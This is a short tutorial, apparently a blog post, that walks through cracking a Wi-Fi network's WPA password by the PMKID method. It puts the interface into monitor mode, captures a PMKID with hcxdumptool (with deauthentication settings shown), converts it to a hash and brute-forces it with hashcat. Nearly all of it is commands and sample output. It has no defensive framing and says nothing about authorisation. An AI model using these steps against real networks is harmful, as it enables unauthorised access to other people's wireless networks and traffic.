Download and install the tools
hcxdumptool
git clone
cd hcxdumptool
make
make install
hcxtools
git clone
cd hcxtools
make
make install
Step-1 : Put your wifi interface to monitor mode
airmon-ng start wlan0
Step-2 : start packet capture
hcxdumptool -o test.pcapng -i wlan0mon --enable_status=3
Output:
start capturing (stop with ctrl+c)
INTERFACE:...............: wlp39s0f3u4u5
FILTERLIST...............: 0 entries
MAC CLIENT...............: 89acf0e761f4 (client)
MAC ACCESS POINT.........: 4604ba734d4e (start NIC)
EAPOL TIMEOUT............: 20000
DEAUTHENTICATIONINTERVALL: 10 beacons
GIVE UP DEAUTHENTICATIONS: 20 tries
REPLAYCOUNTER............: 62083
ANONCE...................: 9ddca61888470946305b27d413a28cf474f19ff64c71667e5c1aee144cd70a69
If an AP recieves our association request packet and supports sending PMKID we will see a message “FOUND PMKID” after a moment:
[13:29:57 - 011] 89acf0e761f4 -> 4604ba734d4e <ESSID> [ASSOCIATIONREQUEST, SEQUENCE 4]
[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [ASSOCIATIONRESPONSE, SEQUENCE 1206]
[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [FOUND PMKID]
Step-3 : convert to hash format
hcxpcaptool -z test.16800 test.pcapng
output:
start reading from test.pcapng
summary:
--------
file name....................: test.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.17.11-arch1
file application information.: hcxdumptool 4.2.0
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 66
skipped packets..............: 0
packets with FCS.............: 0
beacons (with ESSID inside)..: 17
probe requests...............: 1
probe responses..............: 11
association requests.........: 5
association responses........: 5
authentications (OPEN SYSTEM): 13
authentications (BROADCOM)...: 1
EAPOL packets................: 14
EAPOL PMKIDs.................: 1
1 PMKID(s) written to test.16800
Step-4 : Crack the hash using hashcat
Now we have our hash in test.16800 file. Feed it to hashcat to get the password.
Bruteforce mode:
hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?l?l?l?l'